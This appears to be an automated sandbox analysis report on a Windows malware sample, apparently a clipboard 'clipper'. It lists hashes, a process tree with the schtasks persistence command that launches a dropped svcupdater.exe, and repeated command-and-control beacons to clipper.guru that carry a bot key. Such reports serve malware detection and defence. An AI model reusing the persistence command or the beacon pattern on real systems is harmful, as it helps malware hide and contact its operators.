Analysis

  • max time kernel
    291s
  • max time network
    295s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02/11/2022, 22:18 UTC

General

  • Target

    876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe

  • Size

    4.8MB

  • MD5

    80750ddfb5cfe9eb8e2adac60f372534

  • SHA1

    a720efe2b3ef7735efd77de698a5576b36068d07

  • SHA256

    876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04

  • SHA512

    bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f

  • SSDEEP

    49152:RAM2vrGxtRJHHc1RmqAhaShRgdGMYYqWxvdTBB0IEqYjla27EdS5g+A:mMgGxtU1RmqA3xsquvPEdZi+A

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 5 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
    "C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2712
    • C:\Windows\system32\cmd.exe
      cmd.exe "/C schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3512
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
        3⤵
        • Creates scheduled task(s)
        PID:3996
  • C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe
    C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe
    1⤵
    • Executes dropped EXE
    PID:3976

Network

  • flag-us
    DNS
    clipper.guru
    svcupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    clipper.guru
    IN A
    Response
    clipper.guru
    IN A
    45.159.189.115
  • flag-nl
    GET
    http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 429 Too Many Requests
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:19:03 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 169
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:19:03 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 803
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 429 Too Many Requests
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:20:04 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 169
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:20:04 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 803
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 429 Too Many Requests
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:21:05 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 169
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:21:05 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 803
    Connection: keep-alive
  • flag-us
    DNS
    clipper.guru
    svcupdater.exe
    Remote address:
    8.8.8.8:53
    Request
    clipper.guru
    IN A
    Response
    clipper.guru
    IN A
    45.159.189.115
  • flag-nl
    GET
    http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 429 Too Many Requests
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:22:06 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 169
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:22:06 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 803
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 429 Too Many Requests
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:23:07 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 169
    Connection: keep-alive
  • flag-nl
    GET
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    svcupdater.exe
    Remote address:
    45.159.189.115:80
    Request
    GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
    Host: clipper.guru
    User-Agent: Go-http-client/1.1
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Wed, 02 Nov 2022 22:23:07 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 803
    Connection: keep-alive
  • 40.79.189.58:443
    322 B
    7
  • 45.159.189.115:80
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    http
    svcupdater.exe
    679 B
    1.6kB
    7
    6

    HTTP Request

    GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    429

    HTTP Request

    GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    200
  • 45.159.189.115:80
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    http
    svcupdater.exe
    679 B
    1.6kB
    7
    6

    HTTP Request

    GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    429

    HTTP Request

    GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    200
  • 45.159.189.115:80
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    http
    svcupdater.exe
    679 B
    1.6kB
    7
    6

    HTTP Request

    GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    429

    HTTP Request

    GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    200
  • 45.159.189.115:80
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    http
    svcupdater.exe
    725 B
    1.6kB
    8
    7

    HTTP Request

    GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    429

    HTTP Request

    GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    200
  • 45.159.189.115:80
    http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
    http
    svcupdater.exe
    587 B
    1.5kB
    5
    4

    HTTP Request

    GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    429

    HTTP Request

    GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7

    HTTP Response

    200
  • 8.8.8.8:53
    clipper.guru
    dns
    svcupdater.exe
    58 B
    74 B
    1
    1

    DNS Request

    clipper.guru

    DNS Response

    45.159.189.115

  • 8.8.8.8:53
    clipper.guru
    dns
    svcupdater.exe
    58 B
    74 B
    1
    1

    DNS Request

    clipper.guru

    DNS Response

    45.159.189.115

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe

    Filesize

    4.8MB

    MD5

    80750ddfb5cfe9eb8e2adac60f372534

    SHA1

    a720efe2b3ef7735efd77de698a5576b36068d07

    SHA256

    876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04

    SHA512

    bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f

  • C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe

    Filesize

    4.8MB

    MD5

    80750ddfb5cfe9eb8e2adac60f372534

    SHA1

    a720efe2b3ef7735efd77de698a5576b36068d07

    SHA256

    876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04

    SHA512

    bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.